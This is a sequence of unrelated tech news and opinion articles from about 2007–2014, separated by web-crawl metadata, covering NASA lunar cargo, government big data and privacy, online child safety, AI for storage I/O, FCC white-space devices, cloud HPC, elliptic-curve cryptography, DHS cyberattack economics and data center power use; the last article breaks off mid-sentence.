lives lost. I understand exploration requires risk, but it shouldn't require recklessness. But that's just me. What do readers think? In our eagerness to go to Mars, are we rushing into disaster? Now read this:
<urn:uuid:9f6bd81a-1568-435d-8615-ad9e5bf5d0be>
CC-MAIN-2017-09
http://www.itworld.com/article/2713145/hardware/wanted--2-human-guinea-pigs-for-premature-flight-to-mars.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00328-ip-10-171-10-108.ec2.internal.warc.gz
en
0.95823
766
2.78125
3
NASA is looking for help creating a new robotic rover that will deliver cargo to the surface of the moon. The robotic machine NASA wants to build must be able to ferry cargo weighing 66 pounds to 1,102 pounds to various lunar sites. The space agency is seeking proposals from the private sector and plans to create a partnership to build robotic a lunar lander.. The program is dubbed Lunar CATALYST, for Lunar Cargo Transportation and Landing by Soft Touchdown. "As NASA pursues an ambitious plan for humans to explore an asteroid and Mars, U.S. industry will create opportunities for NASA to advance new technologies on the moon," said Greg Williams, NASA's deputy associate administrator for the Human Exploration and Operations Mission Directorate. "[This] will help us advance our goals to reach farther destinations." NASA noted that, in a partnership, the agency would be able to contribute the technical expertise of NASA staff, access to NASA center test facilities, equipment loans, and software for lander development and testing. NASA will host a pre-proposal teleconference on Jan. 27 to giving companies a chance to ask questions about the program. Proposals are due by March 17. The winners are expected to be announced in April. This article, NASA needs commercial help to bring robots on the moon, was originally published at Computerworld.com. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is [email protected]. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center. This story, "NASA Needs Commercial Help Putting Robots on the Moon" was originally published by Computerworld.
<urn:uuid:b0c8e279-fb96-4e2c-a4e2-51f626418bc2>
CC-MAIN-2017-09
http://www.cio.com/article/2379476/government/nasa-needs-commercial-help-putting-robots-on-the-moon.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00504-ip-10-171-10-108.ec2.internal.warc.gz
en
0.910751
375
2.9375
3
In his 1990 book "The New Realities," Peter Drucker noted: "Knowledge is information that changes something or somebody - either by becoming grounds for action, or by making an individual (or an institution) capable of different and more effective action." And that is what Big Data is delivering . . . new knowledge, new insights and new actions, all of which will give us new problems to deal with. Already Big Data is making an impact in government, which, when you think of it, is kind of a "slam dunk" given bureaucracy and huge amounts of data always go hand in hand. So, it will come as no surprise that a recent study conducted by the TechAmerica Foundation and commissioned by SAP AG, discovered that "82% of public IT officials say the effective use of real-time Big Data is the way of the future." Moreover, "83% of Federal IT officials say Big Data can save 10% ($380 billion) or more from the federal budget, or about $1,200 per American." Wow! Sounds fantastic! The study also found that government officials cited the potential of Big Data in lifesaving, crime reduction and improving the quality of citizens' lives. All of these advances were seen as coming from using predictive analytics to mine Big Data, for example, to "develop predictive models about when and where crimes are likely to occur." It also noted that, if the government can gain "insight into huge volumes of data across agencies, the government can provide improved, personalized services to citizens." That sounds great too! We'll get better services for less money! Woo-hoo. But, wait! Hold hard! Any smart person has to wonder what might be the downsides of this brave new whirl of improved government data. What did these government IT people see as the negatives? First, Big Data comes with a very big price tag and the study showed government officials recognize this. Good. Next was "a lack of clarity about Big Data's level of ROI." Very good! And the biggest negative? "The biggest barrier for taking advantage of Big Data is privacy concerns, according to 47% of federal IT officials. Officials believe the challenge will be explaining that Big Data analytics is not equivalent to 'Big Brother.'" On the last point, the officials are dead wrong. In fact, staggeringly wrong. The challenge is about explaining how it would be possible for Big Data analytics not to become "Big Brother"! [TIPS: 7 steps to Big Data success] Already Big Data and predictive analytics in corporate hands has demonstrated unexpected consequences (see the story of Target's data mining program to identify pregnant women for a targeted marketing campaign which I discussed almost a year ago). Now, combine those corporate Big Data resources with the real possibility of the government being able to access them through the provisions of the newly resurrected Cyber Intelligence Sharing and Protection Act (CISPA) -- of which bill sponsor Rep. Dutch Ruppersberger said he didn't see any reason why businesses needed to hide personal data from the government -- and throw in a generous helping of mission creep and what have you got? Bigger Brother on steroids. The first thing you can do about this is make sure that CISPA and the inevitable procession of similar legislation that will follow gets as little traction as possible by joining organizations such as Demand Progress to petition congress to stop the insanity. The second thing? Brace yourself, because Predictive Big Data Analytics will be part of government faster than you can say "fiscal cliff." As for a third thing, pray. Gibbs has his fingers crossed in Ventura, Calif. The government already knows what you think but tell [email protected] anyway. Also follow him on Twitter and App.net (@quistuipater) and on Facebook (quistuipater) and check out the Tech Predictions blog. Read more about software in Network World's Software section. This story, "Big data, big business, big government, bigger brother" was originally published by Network World.
<urn:uuid:c109768f-7a5a-43f8-929e-908a07acbae2>
CC-MAIN-2017-09
http://www.itworld.com/article/2712594/big-data/big-data--big-business--big-government--bigger-brother.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00324-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955711
829
2.640625
3
Yesterday, the 11th of February 2014, was the eleventh annual ‘Safer Internet Day’, a time when the general public, and particularly those who care for children and other vulnerable people, can learn how to stay safe online. What is Safer Internet Day? Coordinated by Chilldnet International, the South West Grid for Learning, and the Internet Watch Foundation, the initiative aims to educate people who may not be aware of the ways in which their details are being shared and the common pitfalls encountered online. Peter Wanless, CEO of the NSPCC, explains further: “Making the internet safer for children and young people is the child protection challenge of this generation. And Safer Internet Day is a chance for everyone – industry, Government, charities, schools, and families – to talk about online safety and share knowledge about what works. A safer internet is built not only by technical endeavour and policies, but by the behaviour of the people that use it. We all need to encourage young people to seek help when they are upset by something or someone online. And service providers and website owners must continue to make it easier for young people to report upsetting content and behaviour, and take swift action to tackle it.” What are the challenges? One of the main challenges faced by companies working in online security is a lack of knowledge on the side of day to day users. The internet is a dynamic area which changes every day – social networking sites update their privacy policies, websites claiming to be reputable are set up for the purpose of defrauding naïve users – and keeping up with all the changes is a full-time job in itself. Of course, one of the most sensitive yet important areas of discussion is how to keep children safe online in a realistic way. According to a recent study released by the Internet Watch Foundation, only 37% of parents have had conversations with their children about what to do if something upsets them online, and just 20% have told their children how to report behaviour that makes them uncomfortable. This lack of preemptive action can lead to young people being confused when difficult situations arise – often when a child is being bullied, or when someone is making advances that make them feel uncomfortable, they do not want to discuss the details with their parents or carers. This leads to some people attempting to restrict young people’s internet access, but with the proliferation of multi-device usage and computers in schools, it is difficult to make this a realistic solution. Giving a young person a level of control over their own internet usage whilst providing them with a space where they can report unwanted behaviour of any kind goes some way towards solving this problem – so why are so few parents investing time in educating their children about internet safety? A common response to this question is simply that ‘the internet’ is too large a subject to broach. Websites change and update daily, children often keep their blogs and profiles hidden from their parents, and the latest trends in online life can seem incomprehensible to people who use the internet solely for work, a few personal emails and perhaps some online shopping. It is unrealistic to expect carers to spend as much time online as the children in their care, and yet this is really the only way to properly understand the social landscape navigated by young people every day. And even when incidents are reported, investigating them can be a challenge. With internet cafés, libraries and cheap handheld devices widely accessible, proving that a specific person perpetrated a crime – or even a series of crimes – is not as simple as gaining access to their personal computer and analysing its contents. Common public misconceptions such as the CSI effect can give rise to frustration on the part of those who report internet safety breaches: members of the general public often find it difficult to understand why law enforcement agents and digital forensics professionals cannot “just hack in and find out”, leaving victims with a sense of despair at not being taken seriously. Yet education about the methodologies used and time required in solving cases of internet safety breaches is not something that can be easily delivered to people with little or no prior training in computer science or digital forensics, particularly when fictional depictions of the field are so far-fetched. Reports of child protection cases in the news media do not generally demonstrate the scale of manpower, time and resource that is required to bring perpetrators to justice, instead focusing solely on results and allowing the public eye to skim over the more complex details. And yet if we want to ensure that young people are safe online, they surely need some level of understanding of both how and where to report unwanted behaviour, and the process that is set in motion once a report has been made. Finding a realistic solution Safer Internet Day aims to address these concerns without placing unrealistic expectations on people who are responsible for children. Rather than being asked to inform young people about the specific dangers of each type of site, or the ways in which they might be exploited online – elements which change every day – the Centre encourages parents and carers to provide children with the skills they need to be able to navigate the web securely, and to deal with any potential danger in a productive manner. Will Gardner, the Safer Internet Centre’s Director, explains: “Everyone has responsibility to make internet safety a priority. Young people are increasingly becoming digital creators and we must equip them with the skills to continue to create and innovate by working together to make the internet a great and safe place. This Safer Internet Day is the biggest one yet – the fantastic range of supporters really reflects how widespread and important this issue is, and we are delighted to see such collaborations where schools, civil society, public and private sectors are all championing the same cause.” And what about educating young people in how investigations are conducted, or about what happens when they submit a report to a law enforcement agency or similar body? There is a certain level of knowledge which can only be gained from training in digital forensics, however the basic concerns of young people can be addressed by giving them at least a rough understanding of how professionals deal with such reports. With this in mind, the three bodies who make up the UK Safer Internet Centre have put together a series of online and offline resources around internet safety. On average, two schools are visited by the team per working day, where talks focus not only on how to report incidents, but also what happens once a report has been made. Follow-up advice is given through the Safer Internet Centre’s website, where a series of helplines provide in-depth, personalised information on subjects ranging from indecent images of children to cyberbullying and scams. Over the past twelve months, 3,846 schools have been reached, over 39,000 reports of indecent content featuring children have been reported to the Safer Internet Centre by members of the public, and 9,550 websites featuring such content have been removed. Whilst progress is not always as fast as people would like, it is at least being made. Everyone, from digital forensics professionals to people who care for children but are not computer literate themselves, can make a difference to the ways in which we deal with online behaviour. In the words of this year’s Safer Internet Day theme, ‘Let’s create a better internet together’.
<urn:uuid:46c7db04-0d55-4865-99f6-3528b84748e7>
CC-MAIN-2017-09
https://articles.forensicfocus.com/2014/02/12/safer-internet-day/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.84/warc/CC-MAIN-20170219104611-00200-ip-10-171-10-108.ec2.internal.warc.gz
en
0.959011
1,505
3.171875
3
Artificial Intelligence and Data Storage "My God. It's Full of Data" - Bowman (My apologies to 2001: A Space Odyssey) Just in case you weren't sure, there is a huge revolution happening. The revolution is around using data. Rather than developers writing explicit code to perform some computation, machine learning applications, including supervised learning reinforcement learning and statistical classification applications can use the data to create models. Within these categories there are a number of approaches, including deep learning, artificial neural networks, support vector machines, cluster analysis, Bayesian networks and learning classifier systems. These tools create a higher level of abstraction of the data, which, in effect, is learning, as defined by Tom Mitchell (taken from Wikipedia): "A computer program is said to learn from experience E with respect to some class of tasks T and performance measure P if its performance at tasks in T, as measured by P, improves with experience E." After learning, these tools can make predictions based on new input data. Rather than create code with sets of rules and conditions to model a problem or a situation, these algorithms utilize only the data to form their own rules and models. There are other algorithms within data analysis that focus on the data with the goal of discovering patterns or models that can explain or inform, as well as predict. There are also areas, such as descriptive statistics that can also create useful information about data. There have been lots of articles written about data analysis, machine learning, deep learning, exploratory data analysis, confirmatory data analysis, big data and other related areas. Generally, the perception is that these tools are used for problems that involve commerce or games with some early scientific applications. However, the truth is that they can be applied to virtually any problem that has data associated with it. Utilizing this data, we can create models and patterns for the purpose of learning more about the overall problem. In this article, I want to discuss a few ideas for using these techniques in the realm of storage. Learning IO Patterns Understanding or quantifying the IO pattern of applications has long been a tedious and often extremely difficult task. However, with an understanding of the IO pattern, you can tailor the storage solution to the application. This could mean improved performance to match the needs of the application, or a more cost-effective storage solution. You can also figure out the IO pattern and then modify the code to improve the IO pattern of the application (however you want to define "improve"). When I'm trying to understand the IO pattern of an application or a workflow, one technique that I use is to capture the strace of the application, focusing on IO functions. For one recent application I examined, the strace output had more than 9,000,000 lines, of which a bit more than 8,000,000 lines were involved in IO. Trying to extract an IO pattern from more than 8,000,000 lines is a bit difficult. Moreover, if the application is run with a different data set or a different set of options, new IO patterns may emerge. Data analysis tools, particularly machine learning, could perhaps find IO patterns and correlations that we can't find. They might also be able to predict what the IO pattern will be based on the input data set and the application runtime options. There are many possible tools that could be applied to finding IO patterns, but before diving deep into them, we should define what the results of the analysis are to be. Do we want to create a neural network that mimics the IO behavior of the application over a range of data sets and input options? Or do we want to concisely summarize the IO patterns with a few numbers? Or perhaps do we want to classify the IO patterns for various data sets and application options? The answers to these and other questions help frame what type of data analysis needs to be done and what kind of input is needed. One important thing to note is that it is unlikely that learning or characterizing IO patters would be done in real time. The simple reason is that to best characterize the pattern, one would need the complete time history of the application. Thus, it can't be done in real time. However, capturing the IO time history of an application is the key to learning and characterizing the IO pattern. Learning about or characterizing the IO patterns, while extremely important, is not enough. The characteristics of the storage itself, both hardware and software, must be determined as well. Knowing the likely IO pattern of an application would then allow either the IO performance to be estimated for a given storage solution or allow a buyer to choose the best storage solution. Imagine a simple scenario: We have an application with a known IO pattern for the given input data set and the options used to run the application. From the IO characterization, we also know that the IO is estimated to take 10 percent of the total time for one storage system or 15 percent with an alternative storage system. This is data analysis for storage! At this point we have a choice. We could run the application/data set combination on the first storage system with one estimated total run time and a given cost. Or we could run on it the second one that is slower, causing the run time to increase, but perhaps with a lower cost. What is really cool is that the data analysis of the IO patterns, our use of artificial intelligence, has allowed this decision to be made with meaningful estimates. No longer do we have to guess or use our gut feeling or intuition as we do today. We use real, hard data to create models or learn about the IO pattern and create information or knowledge that is actionable.
<urn:uuid:db294a30-0e0a-415f-b61e-bbf8e08e798f>
CC-MAIN-2017-09
http://www.enterprisestorageforum.com/storage-management/ai-and-storage-1.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172156.69/warc/CC-MAIN-20170219104612-00552-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947859
1,157
2.78125
3
The FCC's Office of Engineering and Technology issued a report late yesterday that gave negative marks to current attempts at building a personal "white space" receiver and transmitter. Such a device could open up the empty spaces in the television spectrum for unlicensed wireless broadband, unleashing a surge of creativity and innovation that could make WiFi look as attractive as a 900MHz cordless phone. That is, so long as such a device actually works. On the day that the switch over to digital television broadcasts is finalized in early 2009, companies could be free to sell unlicensed devices that can send and receive information in whatever parts of the television spectrum are unused in a given location (well, except for channels 37 and 52-69), so long as they meet FCC engineering criteria. Because the low frequencies used by over-the-air television signals are able to cover great distances and penetrate walls with ease, they theoretically provide a perfect place to deploy wireless broadband technologies over great distances—without having to purchase a chunk of licensed spectrum at auction. The FCC is considering two sorts of these white space devices. The first is mounted in a fixed location, operates at relatively high power, and is installed by professionals. It should be easy enough to set up such device without interfering with nearby TV signals, as the installers will simply guarantee that no channel is broadcasting in that area. This version has already been approved by the FCC. But the other kind of device is trickier to implement. This is a portable/personal white space device which would be deployed at homes and businesses, much like WiFi routers are today. Because of this mass rollout, industry would like to create a device that does not need professional installation. But how to make sure that such a device could work anywhere in the US? The solution that industry groups have come up with is to use spectrum sensing technology and to employ a "listen before talk" transmission system. The white space device would be responsible for determining which frequencies are free in any given location and using only those frequencies without interfering with others. Yesterday's FCC engineering report took a look at two prototype devices submitted by an unnamed industry group (though we already know that they were submitted by the White Spaces Coalition). The conclusion was not pretty: spectrum sensing can be quite spotty, and interference with TV signals is a real issue. But the second device submitted was a marked improvement on the first. The tests, and the spin "Device A" failed its tests miserably, both in the lab and in the field. Engineers took the device to several area houses where DTV signals were already being received by over-the-air antennas. They wanted to see if the device would properly detect the presence of those signals. Alas, "where a DTV signal was strong enough to be received on the TV, the scanner reported its channel to be free or available 40 percent to 75 percent of the time." This means, as the FCC drily puts it, the device "did not provide consistently accurate determinations." Indeed. "Device A" transmitter testing But "Device B" was a major improvement. It had no transmitter (only A had one), and the Coalition specifically told the agency that it was not ready for field testing. But in bench testing, it fared far better than A did and was "generally able to reliably detect DTV signals at -115 dBm in the single channel tests and at -114 dBm in the two-channel tests." It also took only eight seconds to scan each channel, down from a whopping 27 seconds in the first device. "Device B" spectrum sensing tests Still, the FCC concluded that the devices "do not consistently sense or detect TV broadcast or wireless microphone signals," but they noted that these were preliminary units. The White Spaces Coalition, in a statement released today, seized on the performance of Device B. "Coalition members are encouraged that FCC engineers did not find fault with our operating parameters and remain confident that unlicensed television spectrum can be used without interference," said the group. "We will work with the Federal Communications Commission to resolve any open questions quickly enabling the FCC to meet its October deadline and delivering on the common goal of driving innovation and expanding Internet access for all Americans." The National Association of Broadcasters, which has been opposed to the devices over concerns about interference, had a different take. Its statement, also released this morning, said that the report "revealed that portable, unlicensed devices cause interference to television broadcast signals, an assertion television broadcasters, sports leagues, wireless microphone manufacturers, and others have long made."
<urn:uuid:30ab6289-c498-4f71-9ab6-15d9b4ecdf3a>
CC-MAIN-2017-09
https://arstechnica.com/uncategorized/2007/08/white-space-devices-get-black-marks-from-fcc/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00076-ip-10-171-10-108.ec2.internal.warc.gz
en
0.975463
930
2.703125
3
When considering moving excess or experimental HPC applications to a cloud environment, there will always be obstacles. Were that not the case, the cost effectiveness of cloud-based HPC would rule the high performance landscape. Jonathan Stuart Ward and Adam Barker of the University of St. Andrews produced an intriguing report on the state of cloud computing, paying a significant amount of attention to the problems facing cloud computing. The researchers split the problems into two factions: technological and legal. The second bit has added gravity today in light of recent leaks on the data mining activities of the United States National Security Agency, although those specific circumstances will not be discussed here. However, according to the report, an incident in 2010 (Wikileaks) laid the foundation for an environment where such infringement could happen. However, the technological concerns are more relevant to those seeking to outsource HPC applications to the cloud. Virtualization, according to the report, is a key to running high performance applications in a cloud setting. That should be neither surprising nor interesting, as cloud computing is sometimes referred to as ‘computing in a virtualized environment.’ However, it is an important distinction to consider. As the report noted, “virtualizing a computer system reduces its management overhead and allows it to be moved between physical hosts and to be quickly instantiated or terminated.” As computations in a public cloud must be somehow sent back to the host and it is preferable that such sending happens quickly, virtualization is understandably important. The preferred infrastructure to virtualize into a cloud environment would be that of the Intel x86, used in many localized HPC instances. That affinity presents problems for cloud computing. “The x86 architecture was not conceived as a platform for virtualization. The mechanisms which allow x86 based virtualization either require a heavily modified guest OS or utilise an additional instruction set provided by modern CPUs which handles the intercepting and redirecting traps and interrupts at the hardware level.” It is of course possible to virtualize such an architecture, but it will result in what the researchers call a performance penalty. That penalty has been significantly reduced over the last few years, but is still present and can manifest itself in I/O performance, sometimes in extreme ways. “IO performance in certain scenarios,” the researchers note, “suffers an 88% slowdown compared to the equivalent physical machine.” One of the main principles behind computing in the cloud is the optimization of resources. Virtualized machines (or Virtual Machines, or VMs) curtail performance to ensure the servers are in usage, which is not necessarily ideal. A further issue raised by Ward and Barker to computing in the cloud is the interoperability among major cloud service providers like Amazon, Google, Rackspace, and Microsoft. They related it to mainframe computing, which was dominated by IBM in the 1970s. “Increased interoperability is essential in order to avoid the market shakeout the mainframe industry encountered in the 1970s. This is a significant concern for the future of cloud computing.” Scaling up is another issue presented by the researchers, but one they feel is at least somewhat adequately addressed by the development of NoSQL. “It is NoSQL which has been a driving force behind cloud computing. The unstructured and highly scalable properties of many common NoSQL databases allows for large volumes of users to make use of single database installation to store many different types of information.” It is this notion that carries the storage capacity for HPC applications in things like Azure and S3. Of course, it is difficult to discuss the complications of computing in the cloud without addressing security and what the report refers to as trust issues. The report, which was coincidentally published last week, seems prescient considering the NSA PRISM leaks that have been brought to light over the last week or so. The researchers here delved into how the Wikileaks incident in 2010 laid the groundwork. “Without a comprehensive legal framework in place it is impossible to conclusively argue what parties cannot access or otherwise interfere with cloud based operations. This issue is problematic for organisations such as Wikileaks which are not well received by world governments. Unfavorable organisations can be effectively barred from operating on the cloud by any organisations able to exert influence against the provider.” Determining jurisdiction in these circumstances is hazy. The Amazon datacenter in question over the Wikileaks scandal was based in Europe. However, Amazon is based in the United States, potentially subjecting it to US government pressure if necessary. “Worse still is the possibility that governments can compel cloud providers to provide access to client’s services or data,” the researchers argued. “This is a major problem for cloud computing and if this issue remains unanswered, [one] could potentially see cloud providers relinquishing user and company data to world governments based on a legal mandate.” The security issue is not a new one. Companies with sensitive data take measures to ensure the security of their cloud-housed data, such as adding additional vendor-supplied security layers or participating in a sort of ‘virtual private cloud.’ In this case, it seems unlikely that the NSA would mine experimental financial data to find terrorism patterns. However, as the report noted, a potentially dangerous precedent could be set by these actions. Will this break the trust of companies looking to keep their potentially critical and sensitive data in a cloud service? It is unclear, but this report at least indicates that could happen. From I/O bottleneck issues to scalability to security and trust issues, the complications of cloud HPC are significant. However things like NoSQL (for scale) and better virtualization tools and workload managers are being built to mitigate those issues.
<urn:uuid:a4eac03e-914e-4c7f-bf4f-900c43cf1a95>
CC-MAIN-2017-09
https://www.hpcwire.com/2013/06/13/examining_questions_of_virtualization_and_security_in_the_cloud/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00076-ip-10-171-10-108.ec2.internal.warc.gz
en
0.95623
1,207
2.71875
3
Recently, there have been many advances in cracking encryption algorithms that are the basis for the most common cryptography systems, such as Diffie-Hellman, RSA and DSA. Experts warn that within the next several years, the RSA public key cryptography system could even potentially become obsolete. If that is the case, how will enterprises be able to ensure secure remote access in the near-future? First, let’s take a look at the problem itself. Encryption algorithms ensure security by utilizing the assumption that certain mathematical operations are exponentially difficult, such as the problems of integer factorization and the discrete logarithm, to prevent the decryption of public and private keys. As the key length increases, it becomes exponentially harder to decrypt, which is why key sizes are typically 128 bits and above. After more than 30 years of little progress, researchers have recently started creating faster algorithms for limited versions of the discrete logarithm problem, which has rung the alarm for the entire cryptographic community. It has made us realize that we need to implement a more secure standard, Elliptic Curve Cryptography (ECC). ECC is the best option moving forward for secure remote access via VPNs, because it is based on an operation that not only is difficult to solve but also is a very different problem from the discrete logarithm and integer factorization. Due to its unique characteristics, it is not impacted by advances in decrypting cryptography systems that utilize either of those problems. Currently, ECC is still not widely in use, but that is starting to change. It is particularly important for enterprises to implement ECC over the next several years to improve network security, because if decryption advances proceed at the current rate, TLS, a common protocol that ensures secure communications over the Internet, will be vulnerable to hackers until TLS 1.2, which includes ECC support, becomes widely available. If TLS communications can be decrypted, hackers could steal sensitive data, such as corporate financial information and documents, or even gain complete access to a corporate network to bring it down from the inside. Implementing ECC right now will ensure that the worst case scenario will not happen. It’s time for enterprises to stay ahead of the curve, and use ECC to protect remote access to their corporate networks. This post originally appeared on VPNHaus.com.
<urn:uuid:93b33280-0c38-441f-8f3b-520f10427bb2>
CC-MAIN-2017-09
http://infosecisland.com/blogview/23360-Why-Elliptic-Curve-Cryptography-is-Necessary-for-Secure-Remote-Access.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00248-ip-10-171-10-108.ec2.internal.warc.gz
en
0.950574
482
3.125
3
What happens when the Net is attacked? That's the question an obscure Homeland Security project is attempting to answer. So far, so good. - By William Jackson - Jul 20, 2006 Without a comprehensive understanding of the potential economic impacts from cyber attacks, it is difficult to make an informed decision regarding ... countermeasures.' 'Andy Purdy, DHS When a building collapses, you can see the devastation. When a network is brought to its knees, the effects are less obvious. That's why a little-known research institute funded by the Homeland Security Department is working to bring some order to the study of cyberattacks. Despite annual reports from the FBI and repeated consultant studies, surprisingly little is known about the real costs of malicious code, denial-of-service and other attacks, because the companies that own the infrastructure are reluctant to share the information. 'Historically, the threat of cyberattacks has not received as much attention as the physical threat posed by terrorism and natural disasters,' said Andy Purdy, acting director of the DHS National Cyber Security Division. As a result, estimates of financial impact have been based on guesses, said Scott Borg, director and chief economist for the U.S. Cyber Consequences Unit. There has been little solid data to analyze, and no tested methodologies to analyze it. We don't even know what threats we should be protecting ourselves against. 'So much of what we have been hearing about cyberattacks was just hearsay,' Borg said. 'We found out a lot of things people were worried about were extremely unlikely.' US-CCU was established in 2004 with a shoestring, four-month budget of $200,000 to do surveys of the electrical-power and health care sectors. Other industry sectors providing critical infrastructure were to be added later. 'We were very naive,' Borg said. 'The research project proved larger and more difficult than anticipated.' The original contract was stretched out to cover a year, and now'well into its second one-year contract'US-CCU is still in what Borg calls a 'rather extended start-up phase.''We have time' Fortunately, doomsday scenarios such as shutting down the power grid or the Internet are not likely to occur soon. 'These are not impossible, but they are way harder to do than a lot of people anticipated,' Borg said. 'Al-Qaida is not going to shut down the Internet or the power grid. So we have time.' To use that time wisely, US-CCU recently released a security checklist to help enterprises focus on real-world consequences of cyberattacks. Borg and research director John Bumgarner based the 478 checklist items on their on-site visits. 'We started seeing huge vulnerabilities during our visits,' Borg said. Most of the systems they evaluated were compliant with current security checklists and industry best practices. 'And portions of those systems were extraordinarily secure. But they were Maginot lines,' susceptible to being outflanked. The problem was that existing best practices were static lists based on outdated data. The US-CCU list shifts the focus from perimeter security to monitoring and maintaining internal systems. The problem with perimeter security is that there is always some way to circumvent it. 'We are way into diminishing returns on our investments in perimeter defense,' Borg said. 'To deal with it now, you have to think of the problem of cybersecurity not from a technical standpoint, but by focusing on what the systems do, what you could do with them and what the consequences [would] be.' Unfortunately, the tools for analyzing consequences have been lacking. The biggest roadblock has been the unwillingness of companies to share data, either with other companies or with the government. 'Without a comprehensive understanding of the potential economic impacts from cyberattacks, it is difficult to make an informed decision regarding investment in and prioritization of countermeasures,' Purdy said. It was Purdy's predecessor in the Cyber Security Division of DHS, Amit Yoran, who authorized formation of US-CCU in April 2004. But the initial impetus came from the department's Private Sector Office, which was concerned about the lack of credible information about the costs of cyberattacks. Borg, a senior research fellow at Dartmouth College's Tuck School of Business, had given briefings to government agencies and corporations on his models for economic analysis. He also had been chief economist on the Livewire cyberattack exercise in 2003 and served in the same capacity in this year's DHS Cyber Storm exercise. He was tapped to lead the effort. Borg advocates applying real-world economics rather than quick-and-dirty estimates to the cost of cyberattacks. 'The cost of cyberattacks can be assessed by looking at how they change the overall inputs and outputs of business,' Borg wrote in his funding proposal to DHS. This is obvious, but previous attempts have simply added up the cost of lost capacity attributed to attacks, without taking into account how much capacity is normally used or how much value it creates. Disruptions in critical infrastructure are often mitigated by work-arounds or by postponing an activity, and value is not completely lost. Initial studies by US-CCU have produced some surprises. In an era of just-in-time inventory and high-speed delivery, shutting down a company or a portion of the infrastructure is normally seen as the greatest threat to productivity. 'But shutting things down for up to three days just doesn't cost much,' Borg said. Systems have enough excess capacity and inventory to survive short shutdowns well. On the other hand, poorly secured process control systems, which form a nexus of the nation's physical and IT infrastructures, appear to be a greater danger than anticipated. These supervisory control and data acquisition'or SCADA'systems, have long been a security concern.Cybersurprise 'I had already been paying attention to SCADA systems,' Borg said. 'But I was surprised by the degree of interconnections with the Internet. 'Most of this stuff has not been a big surprise to the relevant business people,' he said. The problem has been the lack of communication among business people and between business and government, because much of this information is proprietary. It was this wariness that required US-CCU to be set up as an independent institute, working at arms-length from DHS and able to protect corporate data from government. Funds for US-CCU have been funneled through a General Services Administration contract with Sonalysts Inc. of Waterford, Conn., an e-business consulting group that is the legal and financial administrator for the unit. US-CCU has been able to survive on its shoestring budget because the 10-person staff uses its own day-job offices, and much of their work is donated, Borg said. His next goal at US-CCU is to develop more industry-specific security tools, because one size does not fit all in IT security. 'No wonder we have vulnerabilities,' he said. 'This is a huge opportunity for both security vendors and the hacker community.' But instability within the DHS Cyber Security Division has hampered the unit's ability to gain either funding or attention, Borg said. Yoran resigned in September 2004, and Purdy remains in an acting capacity nearly two years later. A newly created slot for assistant secretary of cyber-security is unfilled, and personnel changes have limited institutional memory. The draft of the US-CCU cyber-security checklist was released in April without the DHS name or seal and has yet to be vetted by the department. 'I have tried hard to keep the National Cyber Security Division informed about the CCU's work and sought guidance on the release of the checklist,' Borg said. He tried to set up a meeting to discuss the checklist, but 'the relevant people seemed to have trouble fitting me into their schedules.' Still, Purdy said that 'understanding the consequences of cyberattacks is particularly important in assessing the risk to a critical infrastructure,' and this requires a 'quantitative, systematic and rigorous process,' which US-CCU is striving to provide. Let's hope it's given the chance to succeed.
<urn:uuid:961cfcbb-7b5e-4c3c-9818-8d627983fba2>
CC-MAIN-2017-09
https://gcn.com/articles/2006/07/20/what-happens-when-the-net-is-attacked.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00248-ip-10-171-10-108.ec2.internal.warc.gz
en
0.968168
1,687
2.59375
3
Data Center Power Consumption on the Rise, Report ShowsBy Scott Ferguson | Posted 02-15-2007 The amount of electricity used to power the world's data center servers doubled in a five-year span due mainly to an increase in demand for Internet services, such as music and video downloads, and telephony, according to a new report. If current trends continue, the amount of power to run the world's data center servers could increase by an additional 40 percent by 2010, said Jonathan Koomey, a staff scientist at Lawrence Berkeley National Laboratory in Berkeley, Calif., and a consulting professor at Stanford University. Koomey's report, funded by Advanced Micro Devices, the Sunnyvale, Calif., chip maker, is being presented at the at the LinuxWorld OpenSolutions Summit in New York City on Feb. 15. Between 2000 and 2005, according to Koomey's research, the average amount of power used to fuel servers within the data center doubled. In the United States, that represented a 14 percent annual growth in electrical use, while worldwide use increased by about 16 percent every year. In 2005, the electrical bills for U.S. companies totaled $2.7 billion. The cost of electricity for the entire world topped $7 billion. Within the United States, the total cost of powering data center servers represented about 0.6 percent of total electrical use within the country. When the additional costs of cooling and other usage is factored in, that number jumps to 1.2 percent. "The total power demand in 2005 (including associated infrastructure) is equivalent (in capacity terms) to about five, 1000 MW [megawatt] power plants for the U.S. and 14 such plants for the world," Koomey wrote in the report. The study, using data from IDC, looked specifically at servers used in the world's data centers, which represent about 60 to 80 percent of a data center's total IT loads. As the demand for new technology grew, the number of installed, low-end volume serverstypically systems under $25,000, which also includes bladesincreased. This trend seems to have driven the skyrocketing energy consumption of the last five years more than the actual energy usage per server. "Almost all of this growth is attributable to growth in the numbers of servers (particularly volume servers), with only a small percentage associated with increases in the power use per unit," according to the report. In the report, Koomey acknowledges that further study of data center equipment, such as data storage and networking equipment, is needed to gain a more insightful and complete view of the average cost of powering a data center. Koomey concludes that a number of factors could change power consumption in the next several years, including the adoption of more blades in the data center, virtualization technology, and more awareness of the total cost of ownership of data center equipment. "The total cost of building a large data center is now on the order of $100 to $200 [million], which is sufficient to get the attention of the CEO of most large organizations," Koomey writes. "That visibility to corporate management is likely to drive operational and design improvements that should over time improve the Site Infrastructure Energy Efficiency Ratio and spur the adoption of energy 